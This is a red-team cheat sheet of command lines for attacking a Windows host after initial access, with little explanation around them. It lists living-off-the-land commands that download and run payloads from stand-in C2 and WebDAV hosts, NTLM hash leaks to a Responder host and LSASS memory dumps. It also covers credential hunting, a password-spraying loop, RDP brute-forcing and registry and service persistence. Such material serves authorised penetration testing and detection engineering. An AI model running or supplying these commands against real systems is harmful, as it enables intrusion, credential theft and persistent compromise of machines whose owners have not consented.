Windows Exploit#
A red-team reference for moving on a Windows host post-foothold. The page leans on living-off-the-land binaries (LoLbins), privilege escalation, RDP exploitation, persistence mechanisms, and LoLBin download chains. Every payload is structured around binaries already present on a default install.
Windows LoLbins#
A LoLBin is a binary already shipped with the OS that the operator co-opts for delivery, execution, or evasion. Several default binaries have side effects that let an operator hide activity post-exploit.
Execute.
$ at.exe at 07:30 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\example.exe
$ Atbroker.exe /start example.exe
$ bash.exe -c example.exe
$ bitsadmin /CREATE 1 & bitsadmin /ADDFILE 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /RESET
$ rundll32.exe zipfldr.dll,RouteTheCall example.exe
$ dotnet.exe \path\to\example.dll
$ wsl.exe -e /mnt/c/Windows/System32/example.exe
Download.
$ bitsadmin /CREATE 1 bitsadmin /ADDFILE 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /COMPLETE 1
$ certutil.exe -urlcache -split -f http://<C2_IPAddress>/example.exe example.exe
$ Excel.exe http://<C2_IPAddress>/example.dll
$ Powerpnt.exe http://<C2_IPAddress>/example.dll
$ hh.exe http://<C2_IPAddress>/example.ps1
$ replace.exe \\<webdav.host.com>\path\example.exe c:\path\outdir /A
Copy.
$ esentutl.exe /y C:\path\dir\src_example.vbs /d C:\path\dir\dst_example.vbs /o
$ expand c:\path\dir\src_example.bat c:\path\dir\dst_example.bat
$ replace.exe C:\path\dir\example.txt C:\path\outdir\ /A
Encode and decode.
$ certutil -encode input_example.txt encoded_example.txt
$ certutil -decode encoded_example.txt output_example.txt
Application whitelist bypass.
$ bash.exe -c example.exe
$ rundll32.exe dfshim.dll,ShOpenVerbApplication http://<URL>/application/?param1=foo
$ regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
$ regsvr32.exe /s /u /i:file.sct scrobj.dll
Credentials.
$ cmdkey /list # cached creds
$ netsh wlan export profile key=clear # plaintext local WiFi
Compile.
$ csc.exe -out:example.exe file.cs
$ csc.exe -target:library -out:example.dll file.cs
$ jsc.exe scriptfile.js # compile JS to .exe
Hash leak via DOS commands.
C:\> dir \\<Responder_IPAddr>\C$
C:\> regsvr32 /s /u /i:\\<Responder_IPAddr>/blah example.dll
C:\> echo 1 > \\<Responder_IPAddr>/blah
C:\> pushd \\<Responder_IPAddr>\C$\blah
C:\> cmd /k \\<Responder_IPAddr>\C$\blah
C:\> cmd /c \\<Responder_IPAddr>\C$\blah
C:\> start \\<Responder_IPAddr>\C$\blah
C:\> mkdir \\<Responder_IPAddr>\C$\blah
C:\> type \\<Responder_IPAddr>\C$\blah
C:\> rpcping -s <Responder_IPAddr> -e 1234 -a privacy -u NTLM
Hash leak via PowerShell.
PS> Invoke-Item \\<Responder_IPAddr>\C$\blah
PS> Get-Content \\<Responder_IPAddr>\C$\blah
PS> Start-Process \\<Responder_IPAddr>\C$\blah
Dump.
$ rundll32.exe C:\Windows\System32\comsvcs.dll #24 "<PID> lsass.dmp full"
$ rundll32.exe comsvcs.dll #24 "<PID> lsass.dmp full"
$ tttracer.exe -dumpFull -attach <PID> # admin only
$ diskshadow.exe /s c:\test\diskshadow.txt # exfil from VSS
Privilege escalation#
Enumerate target groups.
$ net localgroup
$ Get-LocalGroup | ft Name
Users in Administrators.
$ net localgroup Administrators
$ Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Autologon registry entries.
$ reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
$ Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
Credential Manager cache.
$ cmdkey /list
$ dir C:\Users\username\AppData\Local\Microsoft\Credentials\
$ dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\
$ Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
SAM and SYSTEM access.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
Weak permissions.
$ icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone"
$ icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone"
$ icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone"
$ icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users"
$ Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}
Unquoted service paths.
$ wmic service get name,displayname,pathname,startmode 2>nul | findstr /i "Auto" 2>nul | findstr /i /v "C:\Windows\\" 2>nul | findstr /i /v """
$ gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
Scheduled tasks.
$ schtasks /query /fo LIST 2>nul | findstr TaskName
$ dir C:\windows\tasks
$ Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
Startup items.
$ wmic startup get caption,command
$ reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
$ reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
$ reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
$ reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
$ Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl
Network config and SNMP.
$ ipconfig /all
$ route print
$ arp -a
$ netstat -ano
$ file C:\WINDOWS\System32\drivers\etc\hosts
$ netsh firewall show state
$ netsh firewall show config
$ netsh advfirewall firewall show rule name=all
$ netsh dump
$ Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
$ reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Search for passwords in registry, image builds, user dirs.
$ reg query HKCU /f password /t REG_SZ /s
$ reg query HKLM /f password /t REG_SZ /s
$ dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul
$ findstr C:\Users\ /si password *.xml *.ini *.txt *.config 2>nul
WindowsEnum, absolomb/WindowsEnum
$ .\WindowsEnum.ps1
$ powershell -nologo -executionpolicy bypass -file WindowsEnum.ps1
Windows Exploit Suggester (WES-NG), bitsadmin/wesng
$ wes.py --update
$ systeminfo > systeminfo.txt
$ systeminfo.exe /S MyRemoteHost > systeminfo.txt
$ wes.py systeminfo.txt
Scheduler SYSTEM privesc.
$> net use \\[TargetIP]\ipc$ password /user:username
$> net time \\[TargetIP]
$> at \\[TargetIP] 12:00 pm tftp -I [MyIP] GET nc.exe
$> at \\[TargetIP] 12:00 pm C:\Temp\payload.exe
PowerSploit privesc.
$ Import-Module Privesc
$ Invoke-AllChecks
Password spraying one-liner.
$ net user /domain > users.txt
$ echo "password1" >> passwords.txt
$ @FOR /F %n in (users.txt) DO @FOR /F %p in (passwords.txt) DO @net use \\[DOMAINCONTROLLER]\IPC$ /user:[DOMAIN]\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete \\[DOMAINCONTROLLER]\IPC$ > NULL
RDP exploitation#
$ xfreerdp /v:192.168.0.32 -sec-nla /u:"" # user enum (Kerberos)
$ xfreerdp /u:<USERNAME> /g:<RD_GATEWAY> /p:<PASS> /v:192.168.1.34 # login
$ ncrack -vv --user <USERNAME> -P wordlist.txt -s 192.168.0.32:3389
$ crowbar.py -b rdp -u user -C password_wordlist -s <target_ip>/32 -v
$ crowbar.py -b rdp -u <DOMAIN>\\<USER> -c <PASS> -s 10.68.35.150/32
Persistence#
SC service creation.
$ sc create newservice type= own type= interact binPath= "C:\windows\system32\cmd.exe /c payload.exe" & sc start newservice
Winlogon Shell hijack.
$ reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "explorer.exe, payload.exe" /f
$ Set-ItemProperty "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\" "Shell" "explorer.exe, payload.exe" -Force
Winlogon Userinit.
$ reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit /d "Userinit.exe, payload.exe" /f
Other persistence paths.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{GUID}\DllName
HKLM\SOFTWARE\Microsoft\PushRouter\Test\TestDllPath2
HKLM\Software\Microsoft\Windows\Windows Error Reporting\Hangs\ReflectDebugger
HKLM\Software\Microsoft\Cryptography\Offload\ExpoOffload
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\cleanuppath
Werfault.exe reflective debugger launch.
$ werfault.exe -pr 1
Application Shim DLL injection / redirect, install via sbdinst.exe payload.sdb.
VMware Tools persistence by writing into the per-event BAT files.
C:\Program Files\VMware\VMware Tools\poweroff-vm-default.bat
C:\Program Files\VMware\VMware Tools\poweron-vm-default.bat
C:\Program Files\VMware\VMware Tools\resume-vm-default.bat
C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat
Rattler tool to identify DLL hijacks, sensepost/rattler
Command and control#
The C2 Matrix is a directory of C2 frameworks the operator picks between based on adversary emulation plan and target environment. https://www.thec2matrix.com/
LoLBin download options#
PowerShell.
$ powershell.exe -w hidden -nop -ep bypass -c "IEX ((new-object net.webclient).downloadstring('http://[domainname|IP]:[port]/[file]'))"
$ powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://webserver/payload.ps1')|iex"
$ powershell -exec bypass -f \\webdavserver\folder\payload.ps1
CMD.
$ cmd.exe /k < \\webdavserver\folder\batchfile.txt
Cscript / Wscript.
$ cscript //E:jscript \\webdavserver\folder\payload.txt
MSHTA.
$ mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
$ mshta \\webdavserver\folder\payload.hta
RUNDLL32.
$ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/payload.sct");window.close();
$ rundll32 \\webdavserver\folder\payload.dll,entrypoint
WMIC, REGSVR32, ODBCCONF.
$ wmic os get /format:"https://webserver/payload.xsl"
$ regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
$ regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
$ odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}